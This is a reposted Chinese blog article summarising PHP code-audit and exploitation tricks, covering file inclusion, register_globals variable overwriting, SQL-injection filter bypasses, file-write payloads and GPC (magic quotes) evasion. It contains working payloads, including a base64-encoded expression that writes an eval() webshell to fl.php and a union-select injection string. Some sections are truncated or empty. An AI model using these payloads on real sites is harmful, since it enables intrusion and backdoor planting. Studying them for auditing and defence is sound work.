一些php源码审计与利用技巧

花了一些时间翻阅了wolvez中源码审计帖子，发现里面很多关于文件包含的漏洞，当然还有很多高级利用帖子。总体来说又扩充了一下关于php漏洞挖掘方面的思路，先总结如下，在总结之前先看看：http://www.91ri.org/category/newbugs/fuzzbug 的文章。 好的 我们开始！

1、文件包含
原来有介绍文件包含 其实当时候总结的还不是很全，还有几点需要补充的。
查找思路：先找到哪些文件中include，require函数中包含有可控制的变量，然后看哪些文件包含了这个文件。
利用：
条件：在allow_url_include = On且PHP >= 5.2.0的条件下
利用的时候采用data://或者php://input是一个不错的选择

截断方式：

截断方式：
%00(GPC开启时会转义)  长文件名（///////)
注：php5.3.4以后已经修复了%00漏洞

包含tmp文件夹下文件：
注上传一个webshell到/tmp文件夹下包含（../../../x.php）。

2、变量覆盖
条件：需要开启register_globals（php5.4已删除，见此文http://blog.ourren.com/2012/03/13/php5.4_remove_safe-function.html ），有时候还可能会考虑GPC。
数组未初始化覆盖技巧蛮多的。
新认识的函数：parse_str

3、注入关键字过滤
‘    %2%277  过滤%27时，针对str_replace过滤关键字符，其他过滤方式结合具体情况
‘    %2527  针对urldecode()函数
空格  ()替代空格的方法绕过：union(select(password),2,3,4,5,6,7,8,9,0,1+from+[zt_admin])

4、文件写操作
两种比较好的利用代码：
字符写文件

这样你在访问一次hxxp://www.xxx.com/data/error.php 后将得到 hxxp://www.xxx.com/data/wolvez.php 的测试文件
内容为<?phpinfo():?>l

双引号（base64）写文件，然后包含执行

http://${${fputs(fopen(base64_decode(ZmwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4x))}}
上面这段代码是将 <?php @eval($_POST[a]); ?>1 到fl.php文件。利用base64_encode编码避免了使用单引号，所以无须考虑gpc的影响。注意，在字符串不包括 + =等特殊符号的情况下，base64_decode的参数是无须使用单引号或者双银引号的。

5、GPC绕过
$_SERVER数组不受GPC影响。
GPC与substr组合：有些地方经过GPC转义后，其他地方有可能用substr进行取值，这时候恰好把”去掉。
数据库（文本）中转：

本文转自ourren由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理，转载请注名出处！